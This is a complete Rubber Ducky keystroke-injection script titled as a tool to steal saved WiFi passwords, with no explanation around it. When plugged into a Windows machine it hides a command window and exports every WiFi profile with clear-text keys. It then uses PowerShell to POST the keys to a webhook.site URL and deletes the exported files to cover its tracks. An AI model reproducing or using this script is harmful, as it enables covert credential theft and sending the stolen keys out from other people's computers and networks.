REM Ducky Script for Steal Saved WiFi Password
REM Author - TechChip - https://github.com/techchipnet - https://youtube.com/techchipnet
DELAY 500
GUI r
DELAY 1000
STRING cmd /k mode con: cols=25 lines=1
DELAY 100
ENTER
DELAY 1000
STRING cd %temp%
ENTER
DELAY 500
STRING netsh wlan export profile key=clear
ENTER
DELAY 500
STRING powershell Select-String -Path Wi-Fi*.xml -Pattern 'keyMaterial' > WiFi-Key
ENTER
DELAY 1000
DELAY 500
REM posts wifi password on webhook.site
STRING powershell Invoke-WebRequest -Uri https://webhook.site/731f1f70-9e0d-4b61-99ed-a064208fc904 -Method POST -InFile WiFi-Key
ENTER
STRING del Wi* /s/f/q
ENTER
DELAY 500
STRING exit
ENTER
